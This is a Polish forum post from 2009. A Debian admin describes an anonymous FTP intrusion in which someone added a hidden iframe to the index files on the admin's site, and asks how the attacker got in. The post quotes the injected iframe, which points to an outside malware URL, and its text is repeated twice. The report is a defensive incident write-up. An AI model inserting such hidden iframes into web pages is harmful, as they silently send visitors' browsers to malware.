Włamanie na FTP i malware na stronie
: 07 lipca 2009, 19:25
Zwracam się do Was z prośbą o pomoc w rozgryzieniu zagadki włamania na mój serwer FTP (vsftpd). Pomoże mi (i pewnie nie tylko) lepiej zabezpieczyć system.
Zwracam się z prośbą nie tylko do guru systemu Debiana lecz także do znawców innej sztuki tajemnej.
A o co chodzi...
Wczoraj jakiś koleś po FTP bez logowania najpierw pobrał wszystkie pliki index.xxx, dodał linijkę: a następnie ponownie je wrzucił na serwer. Zaznaczam - wszystko bez logowania do serwera FTP!
Na szczęście nie narobił szkód, gdyż konto użytkownika ftp służy mi tylko do wstępnego wrzucania plików, które później już po ssh są przenoszone dalej, choć z uprawnieniami tego użytkownika. Zainfekował jedynie pliki, które stanowiły kopię starych witryn lub wersji roboczych, których na wszelki wypadek nie usuwałem (apache nie ma dostępu do tych plików).
Jak zapewne nietrudno się domyśleć, link wskazywał na zainfekowany serwer. Co ciekawe komenda dig pokazuje zawsze 5 IP, a na każdym z nich Linux, głównie Debian. Na porcie w linku zawsze jest aktywny nginx.
Moje pytanie: jak on to zrobił?
Szukałem różnych exploitów na vsftpd ale żaden nie zadziałał.
Druga możliwość to wykorzystanie, którejś strony i hack na apache (wskazuje na to użytkownik, na którego konto nastąpił atak).
Serwer chroni fail2ban oraz firewall zrealizowany na iptables. Po za głównymi konfiguracjami kernela są właściwie tylko 2 grupy reguł. Zezwolenia nawiązania połączeń na określonych portach z netu oraz druga zezwolenia wyjścia co odpowiada określonym usługom na serwerze plus zezwolenie połączeń established i related. Jeśli tak, to gdzie szukać śladów? Gość był sprytny. Każdy plik pobierał i wgrywał ponownie z innego IP.
Jeśli ktoś ma jakieś sugestie - będę wdzięczny. Pomoże mi to lepiej zabezpieczyć serwer
Zwracam się z prośbą nie tylko do guru systemu Debiana lecz także do znawców innej sztuki tajemnej.
A o co chodzi...
Wczoraj jakiś koleś po FTP bez logowania najpierw pobrał wszystkie pliki index.xxx, dodał linijkę:
Kod: Zaznacz cały
<iframe scr="http://a3q.ru:8080/ts/in.cgi?pepsi87" width=125 height=125 style="visibility: hidden"></iframe>
Na szczęście nie narobił szkód, gdyż konto użytkownika ftp służy mi tylko do wstępnego wrzucania plików, które później już po ssh są przenoszone dalej, choć z uprawnieniami tego użytkownika. Zainfekował jedynie pliki, które stanowiły kopię starych witryn lub wersji roboczych, których na wszelki wypadek nie usuwałem (apache nie ma dostępu do tych plików).
Jak zapewne nietrudno się domyśleć, link wskazywał na zainfekowany serwer. Co ciekawe komenda dig pokazuje zawsze 5 IP, a na każdym z nich Linux, głównie Debian. Na porcie w linku zawsze jest aktywny nginx.
Moje pytanie: jak on to zrobił?
Szukałem różnych exploitów na vsftpd ale żaden nie zadziałał.
Druga możliwość to wykorzystanie, którejś strony i hack na apache (wskazuje na to użytkownik, na którego konto nastąpił atak).
Serwer chroni fail2ban oraz firewall zrealizowany na iptables. Po za głównymi konfiguracjami kernela są właściwie tylko 2 grupy reguł. Zezwolenia nawiązania połączeń na określonych portach z netu oraz druga zezwolenia wyjścia co odpowiada określonym usługom na serwerze plus zezwolenie połączeń established i related. Jeśli tak, to gdzie szukać śladów? Gość był sprytny. Każdy plik pobierał i wgrywał ponownie z innego IP.
Jeśli ktoś ma jakieś sugestie - będę wdzięczny. Pomoże mi to lepiej zabezpieczyć serwer